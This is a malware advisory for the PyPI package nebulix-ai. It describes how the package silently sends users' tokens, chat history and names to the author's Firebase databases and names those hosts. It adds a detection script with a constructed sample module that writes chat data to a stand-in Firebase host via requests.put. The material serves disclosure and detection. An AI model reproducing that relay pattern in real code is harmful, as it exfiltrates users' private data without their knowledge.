
MAL-2026-4758

Malicious code in nebulix-ai (PyPI)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (93ea83117b0ae362a2b55ad581d69b3600c81b78d2e90c19bb1ea9eea2266a4c)

The package's documented `NebulixEngine.chat()` API hardcodes two Firebase Realtime Database URLs owned by the author (fcmm-48870-default-rtdb.firebaseio.com and tappu-76693-default-rtdb.firebaseio.com) as the destination for caller-supplied data. On engine instantiation the user-provided `auth_token` is sent to the author's auth database; during `chat()`, `session['history']` (last 50 user queries), `user_name`, and `custom_knowledge` are written via `requests.put` to the author's database keyed by the user's token (nebulix/engine.py lines 33-38 and 472). Any developer integrating this library silently exfiltrates their end users' chat content, names, and custom knowledge entries to the author's Firebase project. The behavior is not disclosed in the README or package metadata, and the destination is not configurable — it is the canonical silent-relay shape, where normal use of the advertised API leaks caller data to a hardcoded third-party endpoint. Two embedded Firebase Web API keys are public-by-design identifiers (not credentials) and are noted only as corroborating context that the author's database is the relay target.
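A static check for the silent-relay shape described above, added here as an example and not taken from the advisory or from the package: it parses a module with `ast` and flags a hardcoded Firebase Realtime Database host that appears alongside a `requests` write call. The function name `scan_source`, the `SAMPLE` module and its `example-project` host are constructed for illustration; the two entries in `ADVISORY_HOSTS` are the hosts named in this advisory.

```python
import ast
import re

# Hosts named in the advisory text; everything else below is an assumption.
ADVISORY_HOSTS = {
    "fcmm-48870-default-rtdb.firebaseio.com",
    "tappu-76693-default-rtdb.firebaseio.com",
}
RTDB_HOST = re.compile(r"([a-z0-9-]+\.firebaseio\.com)", re.I)
WRITE_METHODS = {"put", "post", "patch"}


def scan_source(source, filename="<src>"):
    """Report hardcoded RTDB hosts and requests write calls in one module."""
    tree = ast.parse(source, filename=filename)
    hosts, writes = [], []
    for node in ast.walk(tree):
        # String literals, including the constant parts of f-strings.
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for host in RTDB_HOST.findall(node.value):
                hosts.append((node.lineno, host.lower()))
        # Calls of the form requests.put(...), requests.post(...), ...
        elif (isinstance(node, ast.Call)
              and isinstance(node.func, ast.Attribute)
              and node.func.attr in WRITE_METHODS
              and isinstance(node.func.value, ast.Name)
              and node.func.value.id == "requests"):
            writes.append((node.lineno, f"requests.{node.func.attr}"))
    known = sorted({h for _, h in hosts if h in ADVISORY_HOSTS})
    return {"hosts": sorted(hosts), "writes": sorted(writes),
            "known": known, "flagged": bool(hosts and writes)}


# Constructed sample module reproducing the shape, not the package's code.
SAMPLE = '''
import requests

DB_URL = "https://example-project-default-rtdb.firebaseio.com"

class Engine:
    def __init__(self, auth_token):
        self.token = auth_token

    def chat(self, session, user_name):
        payload = {"history": session["history"][-50:], "user_name": user_name}
        requests.put(f"{DB_URL}/users/{self.token}.json", json=payload)
'''

if __name__ == "__main__":
    print(scan_source(SAMPLE))
```

A hit is a lead for manual review, not a verdict: the signal that matters in this advisory is that the destination is fixed in the library and cannot be set by the caller.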

Affected packages

PyPI / nebulix-ai

No fixed version published yet for nebulix-ai (pip). Pin to a known-safe version or switch to an alternative.

References